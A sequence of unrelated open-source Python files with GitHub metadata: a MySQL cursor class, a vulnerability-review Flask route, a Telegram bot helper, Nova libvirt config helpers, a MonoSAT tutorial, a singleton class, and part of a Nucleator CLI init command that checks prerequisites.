MySQLCursor.__init__(self, connection)
self._rows = None
self._next_row = 0
def _handle_resultset(self):
(self._rows, eof) = self._connection.get_rows()
self._rowcount = len(self._rows)
self._handle_eof(eof)
self._next_row = 0
try:
self._connection.unread_result = False
except:
pass
def reset(self):
self._rows = None
def _fetch_row(self):
row = None
try:
row = self._rows[self._next_row]
        except (IndexError, TypeError):  # no more rows, or no result set stored
return None
else:
self._next_row += 1
return row
def fetchall(self):
if self._rows is None:
raise errors.InterfaceError("No result set to fetch from.")
res = []
for row in self._rows:
res.append(self._row_to_python(row))
self._next_row = len(self._rows)
return res
def fetchmany(self,size=None):
res = []
cnt = (size or self.arraysize)
while cnt > 0:
cnt -= 1
row = self.fetchone()
if row:
res.append(row)
return res
@property
def with_rows(self):
return self._rows is not None
class MySQLCursorRaw(MySQLCursor):
def fetchone(self):
row = self._fetch_row()
if row:
return row
return None
def fetchall(self):
if not self._have_unread_result():
raise errors.InterfaceError("No result set to fetch from.")
(rows, eof) = self._connection.get_rows()
self._rowcount = len(rows)
self._handle_eof(eof)
return rows
class MySQLCursorBufferedRaw(MySQLCursorBuffered):
def fetchone(self):
row = self._fetch_row()
if row:
return row
return None
def fetchall(self):
if self._rows is None:
raise errors.InterfaceError("No result set to fetch from.")
        return list(self._rows)
@property
def with_rows(self):
return self._rows is not None
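# Typical DB-API usage sketch (connection setup is illustrative, not part of this
# module; cursors are normally obtained via connection.cursor()):
#     cnx = mysql.connector.connect(user='user', database='test')
#     cur = cnx.cursor()
#     cur.execute("SELECT id, name FROM t1 WHERE id = %s", (5,))
#     for row in cur:
#         print(row)
#     cur.close()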
|
{
"content_hash": "e6e6998a431f75c0bbd6bad73a3bf1d6",
"timestamp": "",
"source": "github",
"line_count": 800,
"max_line_length": 78,
"avg_line_length": 31.995,
"alnum_prop": 0.5406704172526957,
"repo_name": "rcosnita/fantastico",
"id": "213b98451a44873051c5ec8719f4f669249aa691",
"size": "26726",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "virtual_env/libs/mysql-connector/python3/mysql/connector/cursor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "6802"
},
{
"name": "Python",
"bytes": "2168052"
},
{
"name": "Shell",
"bytes": "13309"
}
],
"symlink_target": ""
}
|
from flask import Blueprint, render_template, g
from sqlakeyset import get_page # type: ignore
from sqlakeyset.results import s as sqlakeysetserial # type: ignore
from sqlalchemy import desc, asc, or_
from bouncer.constants import READ # type: ignore
from app.auth.acls import requires
from app.vulnerability.views.vulncode_db import VulnViewTypesetPaginationObjectWrapper
from data.models import Vulnerability, Nvd
from data.models.nvd import default_nvd_view_options
from data.models.vulnerability import VulnerabilityState
from data.database import DEFAULT_DATABASE
from lib.utils import parse_pagination_param
bp = Blueprint("review", __name__, url_prefix="/review")
db = DEFAULT_DATABASE
def serialize_enum(val):
return "s", val.name
def unserialize_enum(val):
return val
sqlakeysetserial.custom_serializations = {VulnerabilityState: serialize_enum}
sqlakeysetserial.custom_unserializations = {VulnerabilityState: unserialize_enum}
def get_pending_proposals_paged():
entries = db.session.query(Vulnerability, Nvd)
entries = entries.filter(Vulnerability.state != VulnerabilityState.PUBLISHED)
entries = entries.outerjoin(Vulnerability, Nvd.cve_id == Vulnerability.cve_id)
entries = entries.order_by(asc(Vulnerability.state), desc(Nvd.id))
bookmarked_page = parse_pagination_param("review_p")
per_page = 10
entries_full = entries.options(default_nvd_view_options)
review_vulns = get_page(entries_full, per_page, page=bookmarked_page)
review_vulns = VulnViewTypesetPaginationObjectWrapper(review_vulns.paging)
return review_vulns
def get_reviewed_proposals_paged():
entries = db.session.query(Vulnerability, Nvd)
entries = entries.filter(
or_(
Vulnerability.state == VulnerabilityState.PUBLISHED,
Vulnerability.state == VulnerabilityState.REVIEWED,
Vulnerability.state == VulnerabilityState.ARCHIVED,
),
Vulnerability.reviewer == g.user,
)
entries = entries.outerjoin(Vulnerability, Nvd.cve_id == Vulnerability.cve_id)
entries = entries.order_by(asc(Vulnerability.state), desc(Nvd.id))
bookmarked_page = parse_pagination_param("reviewed_p")
per_page = 10
entries_full = entries.options(default_nvd_view_options)
review_vulns = get_page(entries_full, per_page, page=bookmarked_page)
review_vulns = VulnViewTypesetPaginationObjectWrapper(review_vulns.paging)
return review_vulns
# Render the list of pending proposals and of proposals reviewed by the current user.
@bp.route("/list")
@requires(READ, "Proposal")
def review_list():
review_vulns = get_pending_proposals_paged()
reviewed_vulns = get_reviewed_proposals_paged()
return render_template(
"review/list.html", review_vulns=review_vulns, reviewed_vulns=reviewed_vulns
)
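# The blueprint is registered by the Flask application factory elsewhere in the
# project, roughly: app.register_blueprint(bp) -- which exposes GET /review/list.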
|
{
"content_hash": "afc670959a5247b48937f8bccc4e19af",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 86,
"avg_line_length": 38.69444444444444,
"alnum_prop": 0.7458722182340273,
"repo_name": "google/vulncode-db",
"id": "fa8cde4ae55c63158c8c31d5259c2bc65e281898",
"size": "3362",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/review/routes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "9158"
},
{
"name": "Dockerfile",
"bytes": "2347"
},
{
"name": "HTML",
"bytes": "170436"
},
{
"name": "JavaScript",
"bytes": "139947"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "411821"
},
{
"name": "Shell",
"bytes": "19617"
}
],
"symlink_target": ""
}
|
from telebot import TeleBot, types
class TululBot(TeleBot):
def __init__(self, token):
super(TululBot, self).__init__(token)
self._user = None
@property
def user(self):
if self._user is not None:
return self._user
self._user = self.get_me()
return self._user
@user.setter
def user(self, value):
self._user = value
def reply_to(self, *args, **kwargs):
try:
force_reply = kwargs.pop('force_reply')
except KeyError:
return super(TululBot, self).reply_to(*args, **kwargs)
else:
if force_reply:
kwargs['reply_markup'] = types.ForceReply(selective=True)
return super(TululBot, self).reply_to(*args, **kwargs)
def create_is_reply_to_filter(self, text):
def is_reply_to_bot(message):
return (self.is_reply_to_bot_user(message) and
message.reply_to_message.text == text)
return is_reply_to_bot
def is_reply_to_bot_user(self, message):
replied_message = message.reply_to_message
return (replied_message is not None and
replied_message.from_user is not None and
replied_message.from_user.id == self.user.id)
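# A minimal usage sketch: 'YOUR_TOKEN' and the /ping conversation below are
# placeholder examples showing how force_reply and create_is_reply_to_filter
# might be wired together.
if __name__ == '__main__':
    bot = TululBot('YOUR_TOKEN')

    @bot.message_handler(commands=['ping'])
    def ping(message):
        # force_reply=True attaches a ForceReply markup, so the user's next
        # message arrives as a reply to this prompt.
        bot.reply_to(message, 'pong?', force_reply=True)

    @bot.message_handler(func=bot.create_is_reply_to_filter('pong?'))
    def on_pong_reply(message):
        bot.reply_to(message, 'Thanks for replying!')

    bot.polling()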
|
{
"content_hash": "b5be7a3eeceb7750c19db60737fb0166",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 73,
"avg_line_length": 29.837209302325583,
"alnum_prop": 0.5752143413873734,
"repo_name": "tulul/tululbot",
"id": "2b1bee728056ef01d96cda8e68c6c41913c38808",
"size": "1283",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tululbot/utils/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "46076"
}
],
"symlink_target": ""
}
|
"""
Policy based configuration of libvirt objects
This module provides helper APIs for populating the config.py
classes based on common operational needs / policies
"""
import six
from nova.pci import utils as pci_utils
def set_vif_guest_frontend_config(conf, mac, model, driver, queues=None):
"""Populate a LibvirtConfigGuestInterface instance
with guest frontend details.
"""
conf.mac_addr = mac
if model is not None:
conf.model = model
if driver is not None:
conf.driver_name = driver
if queues is not None:
conf.vhost_queues = queues
def set_vif_host_backend_bridge_config(conf, brname, tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for a software bridge.
"""
conf.net_type = "bridge"
conf.source_dev = brname
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_ethernet_config(conf, tapname):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an externally configured
host device.
NB: use of this configuration is discouraged by the
libvirt project and will mark domains as 'tainted'.
"""
conf.net_type = "ethernet"
conf.target_dev = tapname
conf.script = ""
def set_vif_host_backend_ovs_config(conf, brname, interfaceid, tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an OpenVSwitch bridge.
"""
conf.net_type = "bridge"
conf.source_dev = brname
conf.vporttype = "openvswitch"
conf.add_vport_param("interfaceid", interfaceid)
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_802qbg_config(conf, devname, managerid,
typeid, typeidversion,
instanceid, tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an 802.1qbg device.
"""
conf.net_type = "direct"
conf.source_dev = devname
conf.source_mode = "vepa"
conf.vporttype = "802.1Qbg"
conf.add_vport_param("managerid", managerid)
conf.add_vport_param("typeid", typeid)
conf.add_vport_param("typeidversion", typeidversion)
conf.add_vport_param("instanceid", instanceid)
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_802qbh_config(conf, net_type, devname, profileid,
tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an 802.1qbh device.
"""
conf.net_type = net_type
if net_type == 'direct':
conf.source_mode = 'passthrough'
conf.source_dev = pci_utils.get_ifname_by_pci_address(devname)
conf.driver_name = 'vhost'
else:
conf.source_dev = devname
conf.model = None
conf.vporttype = "802.1Qbh"
conf.add_vport_param("profileid", profileid)
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_hw_veb(conf, net_type, devname, vlan,
tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for a device that supports a hardware
virtual ethernet bridge (VEB).
"""
conf.net_type = net_type
if net_type == 'direct':
conf.source_mode = 'passthrough'
conf.source_dev = pci_utils.get_ifname_by_pci_address(devname)
conf.driver_name = 'vhost'
else:
conf.source_dev = devname
conf.model = None
conf.vlan = vlan
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_hostdev_pci_config(conf, pci_slot):
"""Populate a LibvirtConfigGuestHostdev instance with pci address data."""
conf.domain, conf.bus, conf.slot, conf.function = (
pci_utils.get_pci_address_fields(pci_slot))
def set_vif_host_backend_direct_config(conf, devname, mode="passthrough"):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for a direct interface.
"""
conf.net_type = "direct"
conf.source_mode = mode
conf.source_dev = devname
conf.model = "virtio"
def set_vif_host_backend_vhostuser_config(conf, mode, path):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for vhostuser socket.
"""
conf.net_type = "vhostuser"
conf.vhostuser_type = "unix"
conf.vhostuser_mode = mode
conf.vhostuser_path = path
def set_vif_bandwidth_config(conf, inst_type):
"""Config vif inbound/outbound bandwidth limit. parameters are
set in instance_type_extra_specs table, key is in the format
quota:vif_inbound_average.
"""
bandwidth_items = ['vif_inbound_average', 'vif_inbound_peak',
'vif_inbound_burst', 'vif_outbound_average', 'vif_outbound_peak',
'vif_outbound_burst']
for key, value in six.iteritems(inst_type.get('extra_specs', {})):
scope = key.split(':')
if len(scope) > 1 and scope[0] == 'quota':
if scope[1] in bandwidth_items:
setattr(conf, scope[1], value)
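# A minimal usage sketch, assuming LibvirtConfigGuestInterface from
# nova.virt.libvirt.config; the MAC address, bridge/tap names and extra_specs
# values below are placeholder examples.
if __name__ == '__main__':
    from nova.virt.libvirt import config as vconfig

    conf = vconfig.LibvirtConfigGuestInterface()
    set_vif_guest_frontend_config(conf, mac='52:54:00:12:34:56',
                                  model='virtio', driver=None, queues=4)
    set_vif_host_backend_bridge_config(conf, brname='br-int', tapname='tap0')
    set_vif_bandwidth_config(
        conf, {'extra_specs': {'quota:vif_inbound_average': '1024'}})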
|
{
"content_hash": "02010746a43efc5eafe290d1102a25df",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 78,
"avg_line_length": 31.34355828220859,
"alnum_prop": 0.6572714816989627,
"repo_name": "cernops/nova",
"id": "2522efee43287289bb6dadf86f1c48390363ebd1",
"size": "5719",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nova/virt/libvirt/designer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "983"
},
{
"name": "JavaScript",
"bytes": "2639"
},
{
"name": "Python",
"bytes": "17413087"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "295563"
}
],
"symlink_target": ""
}
|
from reobject.query.parser import Q
from reobject.query.queryset import EmptyQuerySet
from reobject.query.queryset import QuerySet
|
{
"content_hash": "62ba050d3bb6e7ce37348dccf76940bb",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 49,
"avg_line_length": 43.666666666666664,
"alnum_prop": 0.8625954198473282,
"repo_name": "onyb/reobject",
"id": "fd8670cbf936d2e0ee6ca654f42c74a27ea85b6c",
"size": "131",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reobject/query/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "41394"
},
{
"name": "Shell",
"bytes": "145"
}
],
"symlink_target": ""
}
|
import math
def distance(dorf1, dorf2):
"""
Expects two villages as parameters and returns the Euclidean distance between them.
"""
distance = math.sqrt((dorf1.x-dorf2.x)**2 + (dorf1.y-dorf2.y)**2)
return distance
def colorprint(string, color='blue'):
"""
Prettifies output.
Makes debugging fun again.
usage:
>>> colorprint('test', 'magenta')
:param string: Just a string you want to have printed.
:type string: string, obviously
:param color: the color you want to use.
:type color: string
guideline:
red: something went wrong / is bad...
yellow: trying to fix something.
green: fixed something.
blue: important, but rarely recurring events.
turq: important, but often recurring events.
magenta: something special has happened.
white: everything as usual. not of particular interest.
"""
colors = {'red': 31, 'green': 32, 'yellow': 33, 'blue': 34, 'magenta': 35, 'turq': 36, 'white': 37}
print("\033[%sm%s\033[0m" % (colors[color], string))
|
{
"content_hash": "60921fa775cdd84020a861a9ec20ce4d",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 103,
"avg_line_length": 25.170731707317074,
"alnum_prop": 0.6395348837209303,
"repo_name": "erstis-go-botting/TouchOfBob",
"id": "86ee3f50a142c8b80e0509fdec43170ebde5d117",
"size": "1164",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toolbox/tools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "47968"
}
],
"symlink_target": ""
}
|
from monosat import *
#Create two Boolean variables:
a = Var()
b = Var()
# c is true if a is true or b is false, and false otherwise
c = Or(a, Not(b))
#Add a unit clause to the solver, asserting that variable c must be true
Assert(c)
#Solve the instance in MonoSAT, returning True if the instance is SAT and False if it is UNSAT
result = Solve()
if result:
print("SAT")
#After a satisfiable call to Solve(), you can query the assignments given by the solver to
#individual variables using v.value()
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
else:
print("UNSAT")
# After a solve call, you can continue making further assertions, creating new variables,
# and making incremental calls to the solver
d= Var()
Assert(Implies(d, Or(a,b)))
# There are also assertion forms for the common logic constructions, which are slightly more efficient than creating a
# new literal and asserting it to true. An equivalent way to accomplish the above would have been:
AssertImplies(d, Or(a,b))
# Note that d does not yet have an assignment in the solver, and so d.value() will return None until the next solve call
print("Variable 'd' is unassigned, and so has value " + str(d.value()))
result = Solve()
if result:
print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value())) # now d is assigned
else:
print("UNSAT")
#You can use the '~' operator to apply negation, the same way as Not()
Assert(~(And(a, b)))
result = Solve()
if result:
print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value()))
else:
print("UNSAT")
#There is no way to remove assertions from MonoSAT yet, however, you can use assumptions to
#temporarily assert that a variable must be true (or false):
result = Solve([b])
if result:
print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value()))
else:
print("Temporarily UNSAT, under the assumption that 'b' is true")
#If in the previous call, MonoSAT was only UNSAT under an assumption, the solver can still be used in subsequent calls:
result = Solve([~b])
if result:
print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value()))
else:
print("UNSAT (under the assumption that 'b' is False)")
### Theory Support
# Now, onto the interesting stuff.
# In addition to Boolean logic, MonoSAT supports an extensive theory of finite graphs, including
# support for many common graph predicates such as reachability, shortest paths, maximum flows, acyclicity, and
# minimum spanning trees.
# MonoSAT also has support for BitVectors and Cardinality/Pseudo-Boolean constraints.
#Constructing a graph in MonoSAT is as easy as:
g = Graph()
#Create three nodes
n0 = g.addNode()
n1 = g.addNode()
n2 = g.addNode()
#Add three directed edges to the graph.
#You can also create undirected edges, using g.addUndirectedEdge().
e0 = g.addEdge(n0,n1)
e1 = g.addEdge(n1,n2)
e2 = g.addEdge(n0,n2)
#e0, e1, and e2 are *symbolic edges*, meaning that the edge (n0,n1) is included in G if and only if the
#theory atom e0 is assigned to True by MonoSAT.
#You can use e0,e1, and e2 just like variables in MonoSAT, and in that way control which edges are in the graph
#using arbitrary Boolean logic:
AssertNand(e0,e1,e2) # This is logically equivalent to Assert(Not(And(e0,e1,e2)))
AssertOr(e0,e2)
#You can even mix these symbolic edge variables with other logic from MonoSAT
AssertImplies(c, e0)
#Once you have created a graph and some edges, you can assert graph properties about that graph.
#For example, you can assert that node n2 must be reachable from node n0, in g
Assert(g.reaches(n0,n2))
result = Solve()
if result:
print("SAT")
print("e0: " + str(e0.value()))
print("e1: " + str(e1.value()))
print("e2: " + str(e2.value()))
else:
print("UNSAT")
#Graph predicates are 'double sided', so you can also assert that they are false, in order to
#prevent one node from reaching another:
Assert(Not(g.reaches(n1,n0)))
#You can also mix graph predicates in with arbitrary logic, just like variables and edges
Assert(Or(~b, ~g.reaches(n0,n1)))
result = Solve()
if result:
print("SAT")
print("e0: " + str(e0.value()))
print("e1: " + str(e1.value()))
print("e2: " + str(e2.value()))
else:
print("UNSAT")
#Edges can also have weights, represented as fixed-width, bounded bitvectors.
#(By bounded bitvectors, we mean that every bitvector in MonoSAT is asserted to
#be in the range [0, Max], and can never overflow/underflow)
#create a bitvector of width 4
bv0 = BitVector(4)
bv1 = BitVector(4)
bv2 = BitVector(4)
# BitVectors support addition, subtraction, and comparisons, but do not yet directly support
# negative values (the bitvectors are unsigned).
Assert(bv0+bv1 <= 7)
Assert(bv0 + bv2 >= bv1)
Assert(bv0 >= 2)
result = Solve()
if result:
print("SAT")
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
else:
print("UNSAT")
#When creating an edge, you can use bitvectors (or Python ints) as edge weights (otherwise, by default, every edge has weight '1'):
#Create a new graph
g2 = Graph()
#Create three nodes
n4 = g2.addNode()
n5 = g2.addNode()
n6 = g2.addNode()
#Add three weighted edges to the graph
#Weights may be bitvectors, or integer constants.
e3 = g2.addEdge(n4,n5, bv0)
e4 = g2.addEdge(n5,n6, bv1)
e5 = g2.addEdge(n4,n6, bv2)
#MonoSAT supports several useful graph predicates in addition to reachability, including:
#Shortest path constraints:
#Assert that the distance from n4 to n6 is less than or equal to 3 (here the edges carry the bitvector weights defined above)
Assert(g2.distance_leq(n4,n6,3))
#You can also use BitVectors in the arguments of graph predicates:
bv3 = BitVector(4)
Assert(Not(g2.distance_lt(n4,n6,bv3)))
Assert(bv3 == (bv0 + bv1))
result = Solve()
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv3: " + str(bv3.value()))
else:
print("UNSAT")
#MonoSAT also features highly optimized support for maximum flow constraints, allowing for comparisons against either a python integer, or a bitvector:
Assert(g2.maxFlowGreaterOrEqualTo(n4,n6,3))
bv4 = BitVector(4)
Assert(g2.maxFlowGreaterOrEqualTo(n4,n6,bv4))
#Just like with reachability and distance constraints, these maximum flow predicates are two sided
#so you can assert that the maximum flow must be less than a given bitvector, or you can include the
#maximum flow predicate as part of arbitrary Boolean logic
Assert(Or(~c,~g2.maxFlowGreaterOrEqualTo(n4,n6,bv4+1)))
result = Solve()
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv4: " + str(bv4.value()))
else:
print("UNSAT")
result = Solve([bv4==4])
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv4: " + str(bv4.value()))
else:
print("UNSAT")
result = Solve([bv4>4, bv4<7])
if result:
print("SAT")
print("e3: " + str(e3.value()))
print("e4: " + str(e4.value()))
print("e5: " + str(e5.value()))
print("bv0: " + str(bv0.value()))
print("bv1: " + str(bv1.value()))
print("bv2: " + str(bv2.value()))
print("bv4: " + str(bv4.value()))
else:
print("UNSAT")
#MonoSAT also features good support for minimum spanning tree constraints (in undirected graphs):
g3 = Graph()
n7 = g3.addNode()
n8 = g3.addNode()
n9 = g3.addNode()
#Add three weighted, undirected edges to the graph
e6 = g3.addUndirectedEdge(n7,n8, 1)
e7 = g3.addUndirectedEdge(n8,n9, 2)
e8 = g3.addUndirectedEdge(n7,n9, 4)
Assert(g3.minimumSpanningTreeLessEq(3))
Assert(~g3.minimumSpanningTreeLessEq(1))
result = Solve()
if result:
print("SAT")
print("e6: " + str(e6.value()))
print("e7: " + str(e7.value()))
print("e8: " + str(e8.value()))
else:
print("UNSAT")
#(Minimum spanning tree constraints don't support bitvectors yet, but they could in the future)
|
{
"content_hash": "33a86f922248d24b647f65abae4952cf",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 151,
"avg_line_length": 29.762237762237763,
"alnum_prop": 0.6846804511278195,
"repo_name": "sambayless/monosat",
"id": "c769530fd1a86fe897b6f06cf5dd359b0786b5d9",
"size": "9019",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/python/tutorial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "33006"
},
{
"name": "C++",
"bytes": "3493499"
},
{
"name": "CMake",
"bytes": "25650"
},
{
"name": "Cython",
"bytes": "75137"
},
{
"name": "Java",
"bytes": "423109"
},
{
"name": "Python",
"bytes": "269148"
},
{
"name": "Scala",
"bytes": "3262"
}
],
"symlink_target": ""
}
|
"""
Singleton implementation.
Usage:
class A(singleton.Singleton): pass
Please NOTE:
id(A.Instance()) != id(A)
"""
__copyright__ = '2013, Room 77, Inc.'
__author__ = 'Pramod Gupta'
import threading
# with_metaclass method from Six compatibility library.
# https://github.com/benjaminp/six/blob/1.11.0/six.py#L819
def with_metaclass(meta, *bases):
class metaclass(type):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
@classmethod
def __prepare__(cls, name, this_bases):
return meta.__prepare__(name, bases)
return type.__new__(metaclass, 'temporary_class', (), {})
class SingletonException(Exception):
pass
class _SingletonMeta(type):
def __new__(cls, name, bases, dct):
if '__new__' in dct:
raise SingletonException('Can not override __new__ in a Singleton')
return super(_SingletonMeta, cls).__new__(cls, name, bases, dct)
def __call__(cls, *args, **dictArgs):
raise SingletonException('Singletons may only be instantiated through Instance()')
class Singleton(with_metaclass(_SingletonMeta, object)):
_lock = threading.RLock()
@classmethod
def Instance(cls, *args, **kw):
"""
Call this to instantiate an instance or retrieve the existing instance.
If the singleton requires args to be instantiated, include them the first
time you call Instance.
"""
if not cls.Instantiated(): Singleton._createSingletonInstance(cls, args, kw)
return cls._instance
@classmethod
def Instantiated(cls):
# Don't use hasattr(cls, '_instance'), because that screws things up if there is a singleton
# that extends another singleton.
# hasattr falls back to the base class if the attribute is not found on the subclass.
return '_instance' in cls.__dict__
@staticmethod
def _createSingletonInstance(cls, args, kw):
with Singleton._lock:
# Check if the class really needs to be instantiated.
if cls.Instantiated(): return
try:
# Create the new instance and init it.
instance = cls.__new__(cls)
instance.__init__(*args, **kw)
except TypeError as e:
if str(e).find('__init__() takes') != -1:
raise SingletonException('If the singleton requires __init__ args, '
'supply them on first call to Instance().')
else:
raise e
cls._instance = instance
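# A minimal usage sketch; the Config class below is a placeholder example.
if __name__ == '__main__':
    class Config(Singleton):
        def __init__(self, env):
            self.env = env

    c1 = Config.Instance('prod')   # first call creates the instance
    c2 = Config.Instance()         # later calls return the same object
    assert c1 is c2 and c1.env == 'prod'

    try:
        Config('prod')             # direct instantiation is forbidden
    except SingletonException as error:
        print(error)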
|
{
"content_hash": "5120e6440a3df02d7557dd49da461d14",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 98,
"avg_line_length": 29.875,
"alnum_prop": 0.6485355648535565,
"repo_name": "room77/py77",
"id": "4a36a5b6a19e534e69b5d8f4a1d69e23adfd1153",
"size": "2390",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pylib/util/singleton.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1511"
},
{
"name": "Python",
"bytes": "376037"
},
{
"name": "Shell",
"bytes": "9092"
}
],
"symlink_target": ""
}
|
from nucleator.cli.command import Command
from nucleator.cli import utils
from nucleator.cli import ansible
from nucleator.cli import properties
from distutils.version import StrictVersion
import os, subprocess
class Init(Command):
name = "init"
def parser_init(self, subparsers):
"""
Initialize parsers for this command.
"""
init_parser = subparsers.add_parser('init')
def init(self, **kwargs):
"""
This command initializes your nucleator configuration:
- Initializes and populates a .nucleator configuration directory in user's home
directory with sample Customer, Account and Cage configs
- Places initial manifest of versioned nucleator Cage and Stackset Modules with
repo sources in nucleator configuration directory
- Populates an initial rolespec directory with Role definitions required for use
of nucleator modules
- Validates nucleator pre-requisites (ansible, aws) and provides installation
instructions if missing
"""
self.check_prerequisites()
cli=kwargs.get("cli", None)
if cli is None:
raise ValueError("INTERNAL ERROR: cli should have been set by upstream code, but is not specified")
extra_vars={
"verbosity": kwargs.get("verbosity", None),
"debug_credentials": kwargs.get("debug_credentials", None),
"nucleator_dynamic_hosts_src": properties.DYNAMIC_HOSTS_SRC,
"nucleator_dynamic_hosts_dest": properties.DYNAMIC_HOSTS_PATH,
}
return cli.safe_playbook(
self.get_command_playbook("init.yml"),
is_static="Bootstrap",
**extra_vars
)
def check_prerequisites(self):
"""Check that nucleator pre-requisites are in place"""
# graffiti monkey
utils.write("\nChecking graffiti monkey installation...\n")
try:
import graffiti_monkey
from graffiti_monkey.core import GraffitiMonkey
no_graffiti_monkey=False
except ImportError:
no_graffiti_monkey=True
msg="Prerequisite graffiti_monkey not found.\nNucleator requires graffiti_monkey to run. " \
"You can install it via:\n" \
"\tpip install graffiti_monkey==0.7"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# paramiko
utils.write("\nChecking paramiko installation...\n")
try:
import paramiko
no_paramiko=False
except ImportError:
no_paramiko=True
msg="Prerequisite paramiko not found.\nNucleator requires paramiko to run. " \
"You can install it via:\n" \
"\tpip install paramiko"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# pyyaml
utils.write("\nChecking pyyaml installation...\n")
try:
import yaml
no_yaml=False
except ImportError:
no_yaml=True
msg="Prerequisite pyyaml not found.\nNucleator requires pyyaml to run. " \
"You can install it via:\n" \
"\tpip install pyyaml"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# jinja2
utils.write("\nChecking jinja2 installation...\n")
try:
import jinja2
no_jinja2=False
except ImportError:
no_jinja2=True
msg="Prerequisite jinja2 not found.\nNucleator requires jinja2 to run. " \
"You can install it via:\n" \
"\tpip install jinja2"
utils.write_err(msg, False)
utils.write_err("Missing pre-requisite, exiting")
return
# ansible
utils.write("\nChecking ansible Installation\n")
try:
utils.write(subprocess.check_output(["ansible-playbook", "--version"]))
no_ansible=False
except OSError:
no_ansible=True
if no_ansible:
msg="Prerequisite ansible not found.\nNucleator requires ansible to run. " \
"You can install it with all 47Lining pull requests via:\n" \
"\tgit clone --recursive --depth 1 -b nucleator_distribution https://github.com/47lining/ansible.git\n" \
"\tcd ansible; sudo python setup.py install"
utils.write_err(msg, False)
# aws CLI
utils.write("\nChecking aws CLI installation...\n")
try:
utils.write(subprocess.check_output(["aws", "--version"]))
no_aws=False
except OSError:
no_aws=True
if no_aws:
msg="Prerequisite aws not found.\nNucleator requires aws to run. " \
"You can install it via:\n" \
"\tpip install awscli"
utils.write_err(msg, False)
# httplib2
utils.write("\nChecking httplib2 installation...\n")
try:
import httplib2
no_httplib2=False
except ImportError:
no_httplib2=True
msg="Prerequisite httplib2 not found.\nNucleator requires httplib2 to run. " \
"You can install it via:\n" \
"\tpip install httplib2"
utils.write_err(msg, False)
# winrm
utils.write("\nChecking winrm installation...\n")
try:
from winrm import Response
from winrm.exceptions import WinRMTransportError
from winrm.protocol import Protocol
except ImportError:
msg="Prerequisite winrm not found.\nNucleator requires winrm to run when configuring Windows instances. Ignore this if you are not using any Windows instances. " \
"You can install it via:\n" \
"\tpip install pywinrm"
utils.write(msg)
# boto
utils.write("\nChecking boto installation...\n")
try:
import boto
utils.write(boto.Version + "\n")
no_boto=False
if not StrictVersion(boto.Version) >= StrictVersion('2.38.0'):
msg="Prerequisite boto not up to date.\nNucleator requires boto version 2.38.0 or greater to run. " \
"You can install it via:\n" \
"\tpip install boto"
